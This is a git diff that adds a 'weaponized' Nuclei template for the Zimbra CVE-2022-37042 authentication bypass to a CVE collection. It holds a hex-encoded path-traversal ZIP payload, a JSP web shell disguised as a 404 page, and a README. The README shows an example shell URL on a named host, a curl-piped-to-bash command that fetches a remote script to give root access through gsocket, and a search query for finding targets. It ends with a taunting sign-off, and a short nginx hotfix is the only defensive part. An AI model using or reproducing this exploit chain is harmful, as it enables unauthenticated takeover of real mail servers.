diff --git a/cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml b/cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..26d54a2272b141a173f96928b1e340ad68289763
--- /dev/null
+++ b/cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-37042
+
+info:
+ name: Zimbra Collaboration Suite - Unauthenticated RCE + Shell upload
+ author: Aels
+ severity: critical
+ description: |
+ Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. This issue exists because of an incomplete fix for CVE-2022-27925.
+ reference:
+ - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+ - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/
+ - https://github.com/vnhacker1337/CVE-2022-27925-PoC
+ metadata:
+ fofa-query: app="zimbra"
+ shodan-query: http.favicon.hash:"1624375939"
+ tags: cve,cve2022,zimbra,rce,unauth,kev
+
+requests:
+ - raw:
+ - |
+ POST {{path}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ content-type: application/x-www-form-urlencoded
+
+ {{hex_decode("504b0304140000000800fa58145556a5e365950100003103000058001c002e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6f70742f7a696d6272612f6d61696c626f78642f776562617070732f7a696d6272612f7075626c69632f666f726d61747465722e6a7370555409000368a4006369a4006375780b000104f501000004140000008d52d14ee330107ccf572c962a25707140e2099208514020415b15ee037ccd528c12dbd81bd20af5dfcf4e535d8510871fecf17a66762c3b1f5d80114b04d9186da960afe25df09664cd0f7ff5586a7ec84665941fa4292c5f3281b58334f585db93321f5f4f9eaee7e5e9f1294c34c18d6e5595674335cf02e5663a7f00b120a955c15899df4d66bf9f80d6060b46b822064a341e2f9a8a81a375edf11f6d2bb467c79e9e05bdef662cfa7914c967882dbeb5e8882f9166c27a35a18d7b83040e0a506d5d27f011811fba256eac5454ab988d75d308559d018323f8cee408587e392f5972de9bccac5ea07360b6db10011ed78eb0e9d5561bb4b48e99763cdc85259cf4bdeed08e85c338e15255b89a3ec7acf348776e1b333d49b619c33050c0bc55241b0c9e03f45a5ce1a28f151064e3ff651f226ffad9bf15feb4c74f3da72d99961ec9a268403bef698266bf1c0f823bf58f29d58eb957dd11af04897d722583afc2eef3492cd520f17ba99681693dd52fdc9f57f752e1ceb47b9135fa97ea29c3b780affe45200c9a6fec36d1261a957f01504b01021e03140000000800fa58145556a5e3659501000031030000580018000000000001000000a481000000002e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6f70742f7a696d6272612f6d61696c626f78642f776562617070732f7a696d6272612f7075626c69632f666f726d61747465722e6a7370555405000368a4006375780b000104f50100000414000000504b050600000000010001009e0000002702000000000a")}}
+
+ - |
+ GET /public/formatter.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ path:
+ - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1
+ - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd
+
+ stop-at-first-match: true
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 401'
+ - 'status_code_2 == 200'
+ - "contains(body_2,'gh/aels')"
+ condition: and
diff --git a/cve/Zimbra/2022/CVE-2022-37042/README.md b/cve/Zimbra/2022/CVE-2022-37042/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..96c6d352cc49f0a7eda893f2eb2292b4ea84c6de
--- /dev/null
+++ b/cve/Zimbra/2022/CVE-2022-37042/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-37042
+
+
+# Zimbra CVE-2022-37042 Nuclei weaponized template
+
+shell path: `/public/formatter.jsp`
+
+Nuclei itself: https://github.com/projectdiscovery/nuclei
+
+shell have hidden input with 0 opacity, so just hover mouse over it, type command, then press \[Enter\] key:
+
+
+
+example shell url:
+```
+https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
+```
+
+# CVE-2022-37042 hotfix to patch owned servers
+issue this command (but only once):
+```
+cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
+```
+need additional code to servers with not Nginx but Apache. Pull requests are wellcome.
+
+# Zimbra autoroot via zimbslap
+```
+curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
+```
+this command will install global-socket (https://www.gsocket.io/deploy/) and pass you the key to connect as root.
+
+# get zimbra ips
+https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22
+
+happy birthday massacre, motherfuckers ;)
diff --git a/cve/Zimbra/2022/CVE-2022-37042/formatter.jsp b/cve/Zimbra/2022/CVE-2022-37042/formatter.jsp
new file mode 100644
index 0000000000000000000000000000000000000000..2fb4bcf0a851fdb01d10e30a51b49fde1b851210
--- /dev/null
+++ b/cve/Zimbra/2022/CVE-2022-37042/formatter.jsp
@@ -0,0 +1,25 @@
+
+404 Not Found
+<%@ page import="java.io.*" %>
+<%
+ String cmd = request.getParameter("cmd");
+ String output = "";
+ String error = "";
+ if(cmd != null) {
+ String[] commandAndArgs = new String[]{ "/bin/bash", "-c", cmd };
+ String s = null;
+ Process process = Runtime.getRuntime().exec(commandAndArgs);
+ InputStream inputStream = process.getInputStream();
+ BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
+ Thread.sleep(2000);
+ while(process.isAlive()) Thread.sleep(100);
+ while((s = reader.readLine()) != null) { output += s+"\n"; }
+ reader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
+ while((s = reader.readLine()) != null) { error += s+"\n"; }
+ }
+%>
+
+
+ <%=output %>
+ <%=error %>
+
\ No newline at end of file
diff --git a/cve/Zimbra/2022/CVE-2022-37042/shell2.zip b/cve/Zimbra/2022/CVE-2022-37042/shell2.zip
new file mode 100644
index 0000000000000000000000000000000000000000..79ff3ba28a051e03bfaaf69c7088720a4dff6db8
Binary files /dev/null and b/cve/Zimbra/2022/CVE-2022-37042/shell2.zip differ
diff --git a/cve/Zimbra/2022/yaml/CVE-2022-37042.yaml b/cve/Zimbra/2022/yaml/CVE-2022-37042.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..a1e10170226478efbb0cd39de188498cc68ebfdc
--- /dev/null
+++ b/cve/Zimbra/2022/yaml/CVE-2022-37042.yaml
@@ -0,0 +1,21 @@
+id: CVE-2022-37042
+source: https://github.com/aels/CVE-2022-37042
+info:
+ name: Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。
+ description: |
+ CVE-2022-37042中,攻击者可构造恶意请求绕过相关权限验证,配合CVE-2022-27925可在无需登录的情况下执行任意代码,控制服务器。
+ scope-of-influence:
+ ZCS < 8.8.15 patch 33
+ ZCS < 9.0.0 patch 26
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+ - https://avd.aliyun.com/detail?id=AVD-2022-37042
+ - https://www.secpulse.com/archives/185321.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-37042
+ cwe-id: CWE-287
+ cnvd-id: None
+ kve-id: None
+ tags: Zimbra Collaboration, 文件上传
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f3d3f72d12ba915987225e18bb8a28a213b905a4..af97bb6bb1a1db59fb79cbf11e828921d931d845 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -153,6 +153,7 @@ cve:
- CVE-2022-36446
Zimbra:
- CVE-2022-27925
+ - CVE-2022-37042
Grafana:
- CVE-2021-43798
Froxlor: